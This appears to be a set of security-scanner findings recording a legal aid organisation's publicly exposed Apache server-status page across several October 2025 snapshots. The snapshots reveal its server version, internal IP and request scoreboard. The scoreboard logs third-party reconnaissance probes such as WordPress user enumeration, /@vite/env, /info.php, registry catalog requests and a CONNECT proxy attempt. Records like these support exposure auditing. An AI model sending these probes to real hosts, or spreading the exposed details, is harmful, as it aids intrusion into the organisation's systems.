::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-566-0/0/145382. 0.003526500.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-566-0/0/137584. 0.003526400.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-566-0/0/128253. 3.422732800.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-566-0/0/116724. 0.003526300.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-566-0/0/121125. 0.003526200.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-566-0/0/106099. 0.003526100.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-566-0/0/108710. 0.003526000.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-562-0/0/85998. 0.0040282800.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00117750700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00117750600.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00117750500.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00117750300.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00117750400.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00117750200.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82762918500.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00770058200.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15759870300.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0676170026620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23761700200.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00770061700.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00770061500.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32761700210080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00770061600.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00770061400.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00770061300.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00770061200.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00770061100.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00770061000.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001229294900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001229294800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001229294700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001229294600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001229294500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001229294400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001229294300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001229294200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001229294100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001229294000.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.00122929390
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02104813a25
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 27-Oct-2025 11:23:48 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 567 Parent Server MPM Generation: 566 Server uptime: 565 days 18 hours 29 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 13740477 - Total Traffic: 195.0 GB CPU Usage: u407.7 s36.39 cu0 cs0 - .000908% CPU load .281 requests/sec - 4283 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers .__..__.._____W................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-566-0/0/810822. 7.73332700.00.0013411.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-56692390/47/787775_ 8.667992710.02.7113023.47 3.172.90.100http/1.1atlantalegalaid.org:8080GET /img/logo_512.png HTTP/1.1 2-56692050/83/756239_ 17.108012720.02.9712866.98 3.172.90.80http/1.1atlantalegalaid.org:8080GET /imgs/logox.png HTTP/1.1 3-566-0/0/738296. 9.86332800.00.0012341.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-566-0/0/718912. 10.64332400.00.0011829.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-56692440/37/698477_ 6.948002830.02.2111521.12 3.172.90.101http/1.1atlantalegalaid.org:8080GET /assets/index/kuailian/image/favicon.ico HTTP/1.1 6-56691930/25/659192_ 4.088501500.01.7110843.46 15.158.216.99http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 7-566-0/0/634246. 6.27332500.00.0010348.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-566-0/0/602261. 8.09332600.00.009766.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-56692590/29/582095_ 5.748032630.01.779159.14 3.172.90.105http/1.1atlantalegalaid.org:8080GET /static/picture/logo_jg2.png HTTP/1.1 10-566103350/6/513327_ 1.328152490.00.398713.17 3.172.90.70http/1.1atlantalegalaid.org:8080GET /images/log1.png HTTP/1.1 11-566103400/17/478051_ 2.798142680.00.737881.68 3.172.90.105http/1.1atlantalegalaid.org:8080GET /txpro/img/html_icon.ico HTTP/1.1 12-566103450/8/414380_ 1.729503150.00.526557.27 3.172.35.142http/1.1atlantalegalaid.org:8080GET /images/default.png HTTP/1.1 13-566103500/6/328175_ 1.088873080.00.334772.78 3.172.90.70http/1.1atlantalegalaid.org:8080GET /static/image/logo2.png HTTP/1.1 14-5661035525/28/289150W 0.690027.90.224294.59 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 15-565-0/0/264894. 9.18179252610.00.003767.12 147.185.132.177http/1.1atlantalegalaid.org:8080\x16\x03\x01 16-562-0/0/230184. 1.9632054600.00.003424.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-563-0/0/167504. 24.2023283700.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-563-0/0/145381. 14.5523282000.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-563-0/0/137583. 19.0322445000.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-563-0/0/128229. 14.6723281800.00.001821.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-562-0/0/116723. 1.8028734700.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-562-0/0/121124. 0.0132054000.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-562-0/0/106098. 0.0832051100.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-562-0/0/108709. 0.0032055200.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-562-0/0/85998. 0.0032055100.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00109523000.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00109522900.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00109522800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00109522600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00109522700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00109522500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82754690800.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00761830500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15751642600.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0675347256620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23753472500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00761834000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00761833800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32753472510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00761833900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00761833700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00761833600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00761833500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00761833400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00761833300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001221067200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001221067100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001221067000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001221066900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001221066800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001221066700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001221066600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001221066500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001221066400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001221066300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0213fb5ad40
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 26-Oct-2025 19:48:46 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 566 Parent Server MPM Generation: 565 Server uptime: 565 days 2 hours 54 minutes 13 seconds Server load: 0.00 0.00 0.00 Total accesses: 13739332 - Total Traffic: 195.0 GB CPU Usage: u405.33 s37.04 cu0 cs0 - .000906% CPU load .281 requests/sec - 4287 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _____.__.W__.................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-56516040/77/810752_ 13.442571530.01.8413407.61 130.176.187.246http/1.1atlantalegalaid.org:8080GET //xmlrpc.php?rsd HTTP/1.1 1-56515280/69/787719_ 10.832563180.03.5113020.28 130.176.187.230http/1.1atlantalegalaid.org:8080GET //wordpress/ HTTP/1.1 2-56522180/97/756101_ 10.462563140.03.9912862.71 130.176.187.246http/1.1atlantalegalaid.org:8080GET //blog/ HTTP/1.1 3-56515260/41/738212_ 4.872552790.01.6812336.70 130.176.187.230http/1.1atlantalegalaid.org:8080GET //wp/ HTTP/1.1 4-56531490/56/718819_ 7.402573200.02.8411824.59 130.176.187.246http/1.1atlantalegalaid.org:8080GET //blog/robots.txt HTTP/1.1 5-565-0/0/698342. 5.782337700.00.0011517.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-56515380/58/659056_ 9.227382720.02.7610839.34 3.172.76.46http/1.1atlantalegalaid.org:8080GET /favicon.png HTTP/1.1 7-56515440/139/634214_ 11.034932760.03.3610346.30 3.172.35.142http/1.1atlantalegalaid.org:8080GET /img/logo_512.png HTTP/1.1 8-565-0/0/602212. 0.072337600.00.009762.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-565361125/64/582051W 6.220027.92.169157.21 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 10-56536160/53/513281_ 8.665203160.02.758712.63 3.172.35.142http/1.1atlantalegalaid.org:8080GET /assets/index/kuailian/image/favicon.ico HTTP/1.1 11-56536210/68/478030_ 5.0421100.01.677880.90 3.137.73.221http/1.1atlantalegalaid.org:8080\n 12-564-0/0/414337. 4.684888800.00.006554.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-564-0/0/328102. 1.976053600.00.004770.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-564-0/0/289105. 0.007759200.00.004293.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-562-0/0/264814. 0.5023125100.00.003766.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-562-0/0/230184. 1.9626444400.00.003424.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-563-0/0/167504. 24.2017673500.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-563-0/0/145381. 14.5517671800.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-563-0/0/137583. 19.0316834900.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-563-0/0/128229. 14.6717671600.00.001821.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-562-0/0/116723. 1.8023124600.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-562-0/0/121124. 0.0126443800.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-562-0/0/106098. 0.0826440900.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-562-0/0/108709. 0.0026445000.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-562-0/0/85998. 0.0026444900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00103912900.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00103912800.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00103912700.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00103912500.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00103912600.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00103912400.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82749080600.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00756220400.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15746032400.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0674786246620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23747862400.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00756223900.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00756223700.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32747862410080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00756223800.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00756223600.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00756223500.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00756223400.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00756223300.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00756223200.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001215457100.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001215457000.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001215456900.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001215456800.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001215456700.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001215456600.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001215456500.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001215456400.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001215456300.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001215456200.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02147e4ab87
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 25-Oct-2025 06:00:34 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 564 Parent Server MPM Generation: 563 Server uptime: 563 days 13 hours 6 minutes 1 second Server load: 0.00 0.00 0.00 Total accesses: 13737824 - Total Traffic: 194.9 GB CPU Usage: u504.25 s50 cu0 cs0 - .00114% CPU load .282 requests/sec - 4298 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _..___._W____................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-563188820/145/810581_ 32.0323974200.05.6613403.90 70.132.4.80http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 1-563-0/0/787602. 6.803225600.00.0013014.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-563-0/0/755950. 23.153225800.00.0012856.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-563224220/94/738080_ 16.4723994320.02.7812333.10 70.132.4.80http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 4-563218460/50/718721_ 12.9724014480.02.1911820.12 70.132.4.85http/1.1atlantalegalaid.org:8080GET /server HTTP/1.1 5-563197310/99/698261_ 28.6224064390.04.7211514.09 70.132.4.80http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 6-563-0/0/658939. 2.383225900.00.0010833.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-563218510/126/633958_ 31.3023874380.02.9510338.98 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 8-5632185725/241/602146W 24.490027.94.649760.49 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 9-563229730/59/581959_ 7.3323872860.01.219154.27 70.132.4.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-563229780/20/513213_ 3.0124044360.00.648709.48 70.132.4.80http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 11-563229790/30/477942_ 7.3624014290.01.367878.43 70.132.4.80http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 12-563229880/62/414291_ 8.6924094400.01.396553.28 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 13-562-0/0/328079. 3.9410428500.00.004769.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-562-0/0/289103. 3.0112835300.00.004293.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-562-0/0/264814. 0.509515900.00.003766.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-562-0/0/230184. 1.9612835200.00.003424.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-563-0/0/167504. 24.204064400.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-563-0/0/145381. 14.554062700.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-563-0/0/137583. 19.033225700.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-563-0/0/128229. 14.674062500.00.001821.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-562-0/0/116723. 1.809515400.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-562-0/0/121124. 0.0112834600.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-562-0/0/106098. 0.0812831700.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-562-0/0/108709. 0.0012835800.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-562-0/0/85998. 0.0012835700.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0090303700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0090303600.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0090303500.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0090303300.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0090303400.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0090303200.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82735471400.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00742611200.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15732423200.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0673425326620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23734253200.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00742614700.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00742614500.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32734253210080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00742614600.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00742614400.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00742614300.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00742614200.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00742614100.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00742614000.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001201847900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001201847800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001201847700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001201847600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001201847500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001201847400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001201847300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001201847200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001201847100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001201847000.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021d8277505
